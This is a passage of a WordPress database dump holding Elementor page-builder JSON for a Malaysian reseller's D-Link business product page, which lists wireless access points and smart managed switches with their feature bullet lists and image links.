\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3590,2657,'_elementor_version','0.4'),(3593,2658,'_wp_page_template','template-fullwidth.php'),(3594,2658,'_elementor_edit_mode','builder'),(3595,2658,'_elementor_template_type','post'),(3596,2658,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 